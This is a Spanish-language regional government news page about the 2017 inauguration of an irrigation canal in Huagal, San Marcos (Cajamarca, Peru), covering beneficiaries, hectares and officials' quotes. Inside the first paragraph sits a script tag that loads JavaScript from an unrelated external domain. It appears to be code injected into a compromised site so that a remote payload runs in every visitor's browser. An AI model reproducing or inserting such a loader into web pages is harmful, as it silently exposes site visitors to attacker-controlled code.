Ingresar

YA INAUGURAMOS EL CANAL DE RIEGO EN HUAGAL - SAN MARCOS

Martes, 8 Agosto, 2017 - 15:15
El Gobernador Regional de Cajamarca, Porfirio Medina Vásquez, la inauguró del canal de riego “Mejoramiento e Instalación del Servicio de Agua del Centro Poblado de Huagal – San Marcos” y aseveró que la actual gestión seguirá priorizando la infraestructura de riego.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Los beneficiarios tendrán la posibilidad de trabajar sus tierras durante todo el año, mejorando sus ingresos económicos y su producción. Anteriormente era imposible realizar alguna actividad agrícola en verano; sin embargo, ahora podrán sembrar sus productos sin inconveniente alguno.

El canal de riego beneficiará a 496 familias e irrigar cerca de 300 hectáreas destinadas a la siembra de ajo, papa, chocho principalmente. “Ahora tendremos la posibilidad de realizar dos o tres cosechas al año y evitar trasladarse a trabajar en otros lugares en épocas de estiaje”, manifiesta un beneficiario.

En el marco del proyecto se ha construido 20 reservorios revestidos con geomembrana, 20 captaciones de diferentes capacidades y cerca de 50 kilómetros de redes de riego. “El cultivo de la tierra es una fuente de riqueza más poderosa que la extracción de minerales”, aseguró el consejero regional por la provincia de San Marcos, Valentín Castañeda.

El Gobernador Regional de Cajamarca, Porfirio Medina Vásquez exhortó a la comunidad de Huagal a ser cuidadosos con esta obra y realizar el mantenimiento correspondiente, teniendo en cuenta que se capacitó a los pobladores en producción de tierra y recibieron asesoramiento de cooperativismo, que les permita mejorar sus ingresos económicos.

AdjuntoTamaño
PDF icon descargue 188.95 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen